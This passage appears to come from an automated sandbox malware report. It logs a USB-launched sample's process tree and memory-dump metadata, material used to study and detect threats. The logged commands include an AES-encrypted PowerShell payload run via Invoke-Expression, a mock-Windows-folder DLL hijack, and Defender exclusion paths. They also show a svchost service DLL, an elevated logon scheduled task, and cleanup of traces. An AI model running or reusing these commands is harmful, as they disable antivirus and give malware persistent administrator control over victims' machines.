          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:23
          Start time:01:40:04
          Start date:30/08/2024
          Path:C:\Windows\explorer.exe
          Wow64 process (32bit):false
          Commandline:explorer "..\USB Drive"
          Imagebase:0x7ff672e00000
          File size:5'141'208 bytes
          MD5 hash:662F4F92FDE3557E86D110526BB578D5
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:24
          Start time:01:40:04
          Start date:30/08/2024
          Path:C:\Windows\explorer.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
          Imagebase:0x7ff672e00000
          File size:5'141'208 bytes
          MD5 hash:662F4F92FDE3557E86D110526BB578D5
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:false

          Target ID:25
          Start time:01:40:04
          Start date:30/08/2024
          Path:C:\Windows\System32\xcopy.exe
          Wow64 process (32bit):false
          Commandline:xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y
          Imagebase:0x7ff6f5310000
          File size:50'688 bytes
          MD5 hash:39FBFD3AF58238C6F9D4D408C9251FF5
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:26
          Start time:01:40:05
          Start date:30/08/2024
          Path:C:\Windows\System32\xcopy.exe
          Wow64 process (32bit):false
          Commandline:xcopy "x249569.dat" "C:\Windows \System32" /Y
          Imagebase:0x7ff6f5310000
          File size:50'688 bytes
          MD5 hash:39FBFD3AF58238C6F9D4D408C9251FF5
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:27
          Start time:01:40:08
          Start date:30/08/2024
          Path:C:\Windows \System32\printui.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows \System32\printui.exe"
          Imagebase:0x7ff78de30000
          File size:64'000 bytes
          MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 0%, ReversingLabs
          • Detection: 0%, Virustotal
          Has exited:true

          Target ID:28
          Start time:01:40:08
          Start date:30/08/2024
          Path:C:\Windows \System32\printui.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows \System32\printui.exe"
          Imagebase:0x7ff78de30000
          File size:64'000 bytes
          MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:31
          Start time:01:40:08
          Start date:30/08/2024
          Path:C:\Windows \System32\printui.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows \System32\printui.exe"
          Imagebase:0x7ff78de30000
          File size:64'000 bytes
          MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:32
          Start time:01:40:09
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:33
          Start time:01:40:09
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:34
          Start time:01:40:09
          Start date:30/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
          Imagebase:0x7ff711290000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:35
          Start time:01:40:13
          Start date:30/08/2024
          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
          Imagebase:0x7ff61b2b0000
          File size:468'120 bytes
          MD5 hash:B3676839B2EE96983F9ED735CD044159
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:36
          Start time:01:40:13
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:38
          Start time:01:40:37
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:39
          Start time:01:40:37
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:40
          Start time:01:40:37
          Start date:30/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
          Imagebase:0x7ff711290000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:41
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:42
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:43
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\sc.exe
          Wow64 process (32bit):false
          Commandline:sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
          Imagebase:0x7ff740850000
          File size:72'192 bytes
          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:44
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
          Imagebase:0x7ff6cfff0000
          File size:77'312 bytes
          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:45
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\sc.exe
          Wow64 process (32bit):false
          Commandline:sc start x338625
          Imagebase:0x7ff7ca9b0000
          File size:72'192 bytes
          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:46
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\svchost.exe -k DcomLaunch
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:false

          Target ID:47
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:48
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:49
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:50
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:51
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\console_zero.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\console_zero.exe"
          Imagebase:0x7ff783490000
          File size:482'304 bytes
          MD5 hash:7D5124735B17F17AB3DACBA515C397F0
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 75%, ReversingLabs
          • Detection: 72%, Virustotal, Browse
          Has exited:true

          Target ID:52
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\timeout.exe
          Wow64 process (32bit):false
          Commandline:timeout /t 10 /nobreak
          Imagebase:0x7ff73a2b0000
          File size:32'768 bytes
          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:53
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c schtasks /delete /tn "console_zero" /f
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:54
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:55
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\schtasks.exe
          Wow64 process (32bit):false
          Commandline:schtasks /delete /tn "console_zero" /f
          Imagebase:0x7ff7b50c0000
          File size:235'008 bytes
          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:56
          Start time:01:40:45
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:57
          Start time:01:40:45
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:58
          Start time:01:40:45
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:59
          Start time:01:40:45
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:60
          Start time:01:40:45
          Start date:30/08/2024
          Path:C:\Windows\System32\schtasks.exe
          Wow64 process (32bit):false
          Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Imagebase:0x7ff7b50c0000
          File size:235'008 bytes
          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:61
          Start time:01:40:45
          Start date:30/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
          Imagebase:0x7ff711290000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:62
          Start time:01:40:47
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:63
          Start time:01:40:47
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:64
          Start time:01:40:48
          Start date:30/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
          Imagebase:0x7ff711290000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:65
          Start time:01:40:50
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:66
          Start time:01:40:50
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Target ID:67
          Start time:01:40:50
          Start date:30/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
          Imagebase:0x7ff711290000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true


            Execution Graph

            Execution Coverage:2.9%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:0%
            Total number of Nodes:3
            Total number of Limit Nodes:0

            Control-flow Graph

            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2029430950.00007FF9C5140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5140000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5140000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$2M_I$3M_I
            • API String ID: 0-2384463353
            • Opcode ID: be444eca2d11449acfd8ca3d2d744fab8e6c9d34a3285268f6bfd0d27d9292a5
            • Instruction ID: 3bdc9574c0d2ea9924694fda86160c2f2491f7214b09d923e6e891a54df2e677
            • Opcode Fuzzy Hash: be444eca2d11449acfd8ca3d2d744fab8e6c9d34a3285268f6bfd0d27d9292a5
            • Instruction Fuzzy Hash: B2F1E522E4E9864FE761DF6858593B97AE0FF46B21F4811BAC04CCB18BDF94EC018B51

            Control-flow Graph

            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"
            • API String ID: 0-4197299889
            • Opcode ID: 948ea2f35f21f51c16d417c79b21b0b7c97fe1ea4a9d462c51ead5da8a766418
            • Instruction ID: fa94716c00adfd42fd47f4250772e65362a86cde342557b22db05139f099bbb1
            • Opcode Fuzzy Hash: 948ea2f35f21f51c16d417c79b21b0b7c97fe1ea4a9d462c51ead5da8a766418
            • Instruction Fuzzy Hash: D7227370A18A5A8FEBA8DF1888957B977E1FF59700F0445B9D44ED3292CE78B881CF41

            Control-flow Graph

            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9b2a9fcf8f3d6c3f38abac18e8ad52ced04d2b0bdc4bda11b202bef4cc4b7e50
            • Instruction ID: de96da5b8b68550bfd8752857ba18571f5ebc11ad9e76f2d008e84974f71a86c
            • Opcode Fuzzy Hash: 9b2a9fcf8f3d6c3f38abac18e8ad52ced04d2b0bdc4bda11b202bef4cc4b7e50
            • Instruction Fuzzy Hash: 5102D235A0CA8B4FEB94DF1898657B977E1EF9A700F940079D44ED32C6DE66B842CB40

            Control-flow Graph

            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c175f51522e5f052bced9b96ec7aa3c4d3d628f7f1e035db3594dd2e0bed7bc5
            • Instruction ID: cd40127ba8f27bfbc7f9a44ba9f3933b0037ca9953cfed7627c2b4feab57320f
            • Opcode Fuzzy Hash: c175f51522e5f052bced9b96ec7aa3c4d3d628f7f1e035db3594dd2e0bed7bc5
            • Instruction Fuzzy Hash: 8B02E435A0CA8B4FEB94DF1898657B977E1EF9A704F5400B9D44ED32C6CE66B842CB40

            Control-flow Graph

            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$6"
            • API String ID: 0-2003467497
            • Opcode ID: 9d3dee340de1f582b56186826366184a33dc6450671b502eb8ebe3ba751516f8
            • Instruction ID: 8d0736832b4da11ee01afd914e5a7be34d1386ba1e0b0dbc61f28669d9567fa5
            • Opcode Fuzzy Hash: 9d3dee340de1f582b56186826366184a33dc6450671b502eb8ebe3ba751516f8
            • Instruction Fuzzy Hash: BCE17770A18A5A8FDB98EF18C8457B977E1FF59700F00457AE44ED3296DE74B8818F81

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000022.00000002.2029430950.00007FF9C5140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5140000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5140000_powershell.jbxd
            Similarity
            • API ID: AttributesFile
            • String ID:
            • API String ID: 3188754299-0
            • Opcode ID: 2769d6a9e0f4cbf6acb781f63eec51483dfd5b80e19eea193c929d06ebdda97f
            • Instruction ID: 1032035e5cf767cf5962e062deb7b9c94f05ccd8c902a7b47369817893809477
            • Opcode Fuzzy Hash: 2769d6a9e0f4cbf6acb781f63eec51483dfd5b80e19eea193c929d06ebdda97f
            • Instruction Fuzzy Hash: F531A03190CA4D8FDB69DF6888496E9BBF1EF56711F04826FD049D3252DB70A806CB91

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 482 7ff9c544042a-7ff9c54404b4 486 7ff9c54404ba-7ff9c54404c4 482->486 487 7ff9c54405bd-7ff9c5440639 482->487 488 7ff9c54404e0-7ff9c54404ed 486->488 489 7ff9c54404c6-7ff9c54404de 486->489 496 7ff9c54404ef-7ff9c54404f2 488->496 497 7ff9c5440561-7ff9c544056b 488->497 489->488 496->497 499 7ff9c54404f4-7ff9c54404fc 496->499 500 7ff9c544057a-7ff9c54405ba 497->500 501 7ff9c544056d-7ff9c5440579 497->501 499->487 503 7ff9c5440502-7ff9c544050c 499->503 500->487 506 7ff9c544050e-7ff9c5440523 503->506 507 7ff9c5440525-7ff9c5440529 503->507 506->507 507->497 510 7ff9c544052b 507->510 514 7ff9c5440531-7ff9c544053a 510->514 515 7ff9c544053c-7ff9c5440549 514->515 516 7ff9c5440553-7ff9c5440560 514->516 515->516 518 7ff9c544054b-7ff9c5440551 515->518 518->516
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2040592094.00007FF9C5440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5440000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5440000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 0U #
            • API String ID: 0-2365300278
            • Opcode ID: f3208b5203e5498400fd5a50225544426a1cb38ee23cefbcc03fc01957ccfda1
            • Instruction ID: fb798e04e2de47903f31780bb574f3513cb869abaf67d338827e6b79f25183e8
            • Opcode Fuzzy Hash: f3208b5203e5498400fd5a50225544426a1cb38ee23cefbcc03fc01957ccfda1
            • Instruction Fuzzy Hash: 40616632A0DA8A8FEB91DB2C58547B57BE1EF99711F1800FBC04DCB193DE68AC168750

            Control-flow Graph

            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"
            • API String ID: 0-4197299889
            • Opcode ID: 736ff34f08e3028e8d76e89dabeefd69abdd97a14f44e98413be7672cd6ac5d1
            • Instruction ID: 2fc4712a316219faee125720d683b8a35f04328351a09d10b80fafab7bf7ddce
            • Opcode Fuzzy Hash: 736ff34f08e3028e8d76e89dabeefd69abdd97a14f44e98413be7672cd6ac5d1
            • Instruction Fuzzy Hash: 56418F71B18A4A4FEB54EF689C563B9BAD1FF4A710F4441BAE40DE3393DE6578018780

            Control-flow Graph

            • Executed
            • Not Executed
